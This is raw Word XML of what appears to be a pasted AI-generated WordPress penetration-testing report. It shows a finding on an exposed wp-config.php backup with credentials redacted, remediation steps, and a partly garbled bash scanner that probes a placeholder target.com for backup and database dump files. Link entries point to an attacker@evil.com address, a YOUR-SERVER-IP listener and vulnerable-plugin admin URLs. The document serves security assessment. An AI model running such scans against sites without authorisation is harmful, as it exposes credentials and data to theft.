        <w:t>define(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'AUTH_KEY', 'put your unique phrase here' ); define( 'SECURE_AUTH_KEY', 'put your unique phrase here' ); // ... etc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// Table prefix (useful for SQL injection attacks) $table_prefix = 'wp_';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 xml:space="preserve">// Debug mode (might reveal additional info) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>define(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'WP_DEBUG', true );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**Evidence &amp; Impact</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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:*</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/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val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>*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Finding: wp-config.php Backup File Exposed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 xml:space="preserve">URL: </w:t>
      </w:r>
      <w:hyperlink r:id="rId23" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com/wp-config.php.bak</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Status: 200 OK Content-Type: text/plain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Impact:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Full database credentials exposed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Database: wordpress_production</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Username: wp_admin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Password: [REDACTED in report, client notified separately]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Security keys exposed (session forging possible)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Debug mode enabled (verbose errors)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Severity: CRITICAL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Immediate Actions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Remove all wp-config backup files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Rotate database credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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Regenerate WordPress security keys</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03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  <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Disable WP_DEBUG in production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lastRenderedPageBreak/>
        <w:t>### 9.2 Backup Files Discovery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**Comprehensive Backup Search:**</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B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1B03AE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```bash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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>bin/bash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eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>backup_scanner.sh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TARGET="</w:t>
      </w:r>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>https://target.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>" OUTPUT="evidence/backup_discovery.txt"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echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> "=== Backup File Discovery ===" &gt; $OUTPUT echo "Target: $TARGET" &gt;&gt; $OUTPUT echo "Date: $(date)" &gt;&gt; $OUTPUT echo "" &gt;&gt; $OUTPUT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Common backup extensions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extensions=("bak" "old" "backup" "~" "save" "copy" "orig" "tmp")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Common backup patterns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files</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>=( "wp-config.php" ".htaccess" "index.php" "wp-settings.php" )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Database dumps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db_files=( "dump.sql" "backup.sql" "wordpress.sql" "database.sql" "db_backup.sql" "mysql.sql" "wp_backup.sql" )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Compressed backups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r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>archives=( "backup.zip" "backup.tar.gz" "backup.tar" "wordpress.zip" "site-backup.zip" "</w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:history="1">
        <w:r w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t>www.zip</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>" "public_html.zip" )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echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Testing backup files..." | tee -a $OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03A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GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="36"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>Test file backups</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t>for</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en-GB" w:eastAsia="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> file in "${files[@]}"; do for ext in "${extensions[@]}"; do test_file="file.file. file.ext" c </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="00C0369D" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidR="001B03AE" w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:t xml:space="preserve">Claude est une IA et peut faire des erreurs. </w:t>
        </w:r>
        <w:r w:rsidR="001B03AE" w:rsidRPr="001B03AE">
          <w:rPr>
            <w:rFonts w:eastAsia="Times New Roman"/>
            <w:color w:val="0000FF"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="fr-FR"/>
          </w:rPr>
          <w:br/>
          <w:t>Veuillez vérifier les réponses.</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="001B03AE" w:rsidRPr="001B03AE" w:rsidRDefault="001B03AE" w:rsidP="001B03AE">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:eastAsia="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B03AE">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:object w:dxaOrig="4320" w:dyaOrig="4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32.75pt;height:57pt" o:ole="">
            <v:imagedata r:id="rId27" o:title=""/>
          </v:shape>
          <w:control r:id="rId28" w:name="DefaultOcxName" w:shapeid="_x0000_i1033"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w:rsidR="005A3B80" w:rsidRDefault="005A3B80"/>
    <w:sectPr w:rsidR="005A3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A5F77"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4108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2820B1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C83884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7E47F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E59AD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5379C2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AFFA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2C54F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49E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E13FCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="03EA87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665479"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FED4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514DBD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="171A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C441F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6D10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5909A8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A5A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9F2562"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="959E6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BC21E30"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9236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15508F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="AEF0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FA645A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="380E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D3022E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A3B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0B0FD0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8D4C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8E37BE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="58E0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6"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="1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C19"/>
    <w:rsid w:val="00126848"/>
    <w:rsid w:val="001B03AE"/>
    <w:rsid w:val="002A24EB"/>
    <w:rsid w:val="003A36DD"/>
    <w:rsid w:val="005A3B80"/>
    <w:rsid w:val="005D5C19"/>
    <w:rsid w:val="006B6739"/>
    <w:rsid w:val="006C3A9D"/>
    <w:rsid w:val="006E34EF"/>
    <w:rsid w:val="00904EF6"/>
    <w:rsid w:val="00977922"/>
    <w:rsid w:val="00991D4D"/>
    <w:rsid w:val="00A440EF"/>
    <w:rsid w:val="00A513D9"/>
    <w:rsid w:val="00BE6417"/>
    <w:rsid w:val="00C0369D"/>
    <w:rsid w:val="00D82576"/>
    <w:rsid w:val="00EB023D"/>
    <w:rsid w:val="00FB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B03AE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B03AE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B03AE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03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia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B03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia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B03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Aucuneliste1">
    <w:name w:val="Aucune liste1"/>
    <w:next w:val="Aucuneliste"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="001B03AE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B03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B03AE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1B03A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1B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-text-500">
    <w:name w:val="text-text-500"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B03AE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1B03AE"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-error">
    <w:name w:val="katex-error"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex">
    <w:name w:val="katex"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-html">
    <w:name w:val="katex-html"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="base">
    <w:name w:val="base"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="strut">
    <w:name w:val="strut"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hovertext-text-300">
    <w:name w:val="hover:text-text-300"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="is-empty">
    <w:name w:val="is-empty"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A440E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B03AE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B03AE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B03AE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03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia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B03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia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B03AE"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="27"/>
      <w:szCs w:val="27"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="numbering" w:customStyle="1" w:styleId="Aucuneliste1">
    <w:name w:val="Aucune liste1"/>
    <w:next w:val="Aucuneliste"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="font-claude-response-body">
    <w:name w:val="font-claude-response-body"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="001B03AE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B03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B03AE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1B03A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1B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-pre-wrap">
    <w:name w:val="whitespace-pre-wrap"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="text-text-500">
    <w:name w:val="text-text-500"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:styleId="Lienhypertexte">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B03AE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1B03AE"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-error">
    <w:name w:val="katex-error"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex">
    <w:name w:val="katex"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-mathml">
    <w:name w:val="katex-mathml"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="katex-html">
    <w:name w:val="katex-html"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="base">
    <w:name w:val="base"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="strut">
    <w:name w:val="strut"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="mord">
    <w:name w:val="mord"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="hovertext-text-300">
    <w:name w:val="hover:text-text-300"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:rsid w:val="001B03AE"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="is-empty">
    <w:name w:val="is-empty"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="001B03AE"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Times New Roman"/>
      <w:lang w:eastAsia="fr-FR"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragraphedeliste">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00A440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89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3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06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9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67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8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245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0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685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18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9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015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0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11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216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5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8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860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65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41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11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14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7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097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99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38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84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0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08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939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24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3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15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32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5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879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32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21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093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74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18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402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2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34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936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39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27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345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56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29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164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26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76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234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3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03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112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81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307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88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833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09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97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107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96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0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332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83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622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27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74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17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0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61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700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97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09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377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2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00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231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13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9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629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39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087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7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90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91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16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22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985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12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12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301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8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29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098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37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04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308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2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25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834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0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49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680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91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9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90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236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64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78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132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72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66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060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9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42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369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1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53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177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05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41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60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77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17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521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0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64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4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5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2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66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4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1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451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86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14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70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7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55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1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7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77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693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65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174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82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72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1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541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5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81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5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32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05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28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95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78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7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45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2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3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3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36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2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54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410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63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880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79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283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3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275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182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192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1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653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00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48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25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2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6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03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6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07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98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581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23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65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51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5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2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75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4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297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1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815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73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41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97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608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1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19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9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730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4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34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62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041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87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31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27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310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97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1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38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676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54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940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21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991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6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564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4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2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1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55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56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68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52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33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85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4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215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388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73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392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51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50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091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60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199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0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620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73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482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7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02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028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500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57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290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15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338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84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606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60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100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30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098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04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57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59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32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05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119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65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638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40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00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01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819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7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62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733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14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256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39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53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33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528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50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003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1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89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5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733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08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116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2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62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73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729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1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863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56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133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0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851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64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751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33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834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2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138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37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385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25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604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68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05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318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8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53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2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836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19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26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9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43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227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00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5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87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67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85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96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5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6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1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2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8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091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13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387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6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78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946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6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69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784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20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26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152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9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32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19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29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857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357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63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36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000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04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72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570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693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22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36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839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55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49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808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94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0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676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07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71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034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6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29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595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49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4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841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35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71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927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85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94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896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39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66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298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55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31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839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2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7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271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34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9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551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62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199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986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46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17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687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78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06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666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21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51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699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5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59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194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11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057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53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99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663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3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61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278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25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3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948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46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12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177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42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50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84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9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90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23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38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2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709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8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97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352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11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76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112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48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43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25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5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2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39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336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5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10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392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12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85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669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70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40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943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71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47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195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99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0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007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13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97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20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4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7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75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4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74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310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9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59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9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6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6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7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05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65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473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25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650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42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035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51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45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60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48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46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7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4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79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49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90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530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84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75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55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0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4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93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49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6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07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5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512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15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86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45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443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44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421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06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561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90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885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7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47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37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8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8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98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1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1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522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51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5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96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4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8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76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8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278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60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516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68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129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21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513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20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405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42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157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05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00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683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77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9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684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07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02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079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12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437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60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950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64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171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5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65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7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346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0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144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4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064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05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70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2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99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49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958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64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738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86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339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28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1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59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534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1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024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0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33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34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16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2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69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54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68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41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037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9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517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8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93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312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5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3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90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6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9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317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73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18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48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54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60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463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41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240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5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403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23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582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34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15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65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778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00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670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58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265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47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643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2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166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9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33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13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66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63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837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91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78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31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36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59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084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519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45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124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97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609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98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569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56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41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8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7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130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0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94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2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86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514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0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0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36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60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860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22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36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56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87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rget.com/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-json/custom-plugin/v1/get?id=1" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-content/plugins/vulnerable-plugin/admin.php?admin=true" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://support.anthropic.com/en/articles/8525154-claude-is-providing-incorrect-or-misleading-responses-what-s-going-on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target.com/wp-config.php" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://YOUR-SERVER-IP:8080/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-json/custom-plugin/v1/update" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:attacker@evil.com" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.zip" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-json/wp/v2/users/2" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-content/plugins/vulnerable-plugin/admin.php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target.com/xmlrpc.php" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-json/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://targe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arget.com/wp-json/custom-plugin/v1/admin-function" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://target.com/wp-config.php.bak" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/control" 